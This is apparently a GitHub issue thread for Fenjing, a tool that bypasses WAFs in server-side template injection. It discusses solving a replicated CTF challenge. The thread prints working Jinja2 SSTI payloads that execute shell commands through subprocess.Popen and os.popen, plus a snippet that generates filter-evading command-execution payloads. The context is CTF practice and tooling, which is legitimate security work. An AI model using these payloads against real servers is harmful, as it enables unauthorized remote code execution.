### ISSUE TITLE
How to automatically crack this problem?

### ISSUE THREAD

**Issue by nullchilly** [Marven11/Fenjing#17]
Last week I participated in ASCIS 2023 which has this problem: [Secbiz library](https://quals.ascis.vn/challenges#Secbiz%20library-112)

Since the contest ended I replicated the same challenge on my own server: http://174.138.27.204:1338/

I had to handmade a payload which was: [http://174.138.27.204:1338/{{''.__class__.__mro__[1].__subclasses__()[367]('ls /',shell=True,stdout=-1)%7Cattr('communicate')()}}?DEBUG_MODE_ENABLED=1](http://174.138.27.204:1338/{{''.__class__.__mro__[1].__subclasses__()[367]('ls%20/',shell=True,stdout=-1)%7Cattr('communicate')()}}?DEBUG_MODE_ENABLED=1)

I tried `python -m fenjing crack --url "http://174.138.27.204:1338/" --method GET --inputs "DEBUG_MODE_ENABLED=1"` but it didn't seem to work

Sorry if it was already in the document I can't read Chinese :(

**Comment by Marven11** [comment]
Currently adding extra parameters is not supported... Maybe I will add it in the next version.

The project is for automatically bypassing WAF. Since the challenge don't filter payload, it will be OK to just use payloads like `{{((lipsum.__globals__.__builtins__.__import__('os').popen('ls /')).read())}}`, you don't need to find the `subprocess.Popen` in hundreds of classes or use a script to automatically generate payload.

If you meet challenges that require extra parameter and have a WAF filtering payloads, you can generate payload like this:

```python
import fenjing

def waf(s):
    return "_" not in s

payload, _ = fenjing.exec_cmd_payload(waf, "ls /")
print(payload)
```

and then submit the payload in your way.

Sorry for not having arguments for adding extra parameters, I'll add this feature in the next version.

**Comment by Marven11** [comment]
I add two options `--extra-parms` and `--extra-data` in version 0.5.9, now you can provide extra GET params like `--extra-params 'DEBUG_MODE_ENABLED=1'`
